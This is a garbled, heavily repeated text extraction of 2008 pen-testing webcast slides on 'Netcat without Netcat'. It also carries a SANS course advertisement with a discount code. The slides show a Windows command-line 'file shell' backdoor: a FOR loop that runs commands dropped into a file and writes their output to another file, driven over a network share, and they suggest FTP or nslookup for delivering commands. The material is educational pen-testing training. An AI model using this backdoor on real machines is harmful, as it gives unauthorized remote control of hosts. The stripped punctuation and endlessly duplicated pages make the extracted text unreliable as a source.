Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 33
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 34
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 35
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 36
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 37
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 38
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 39
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008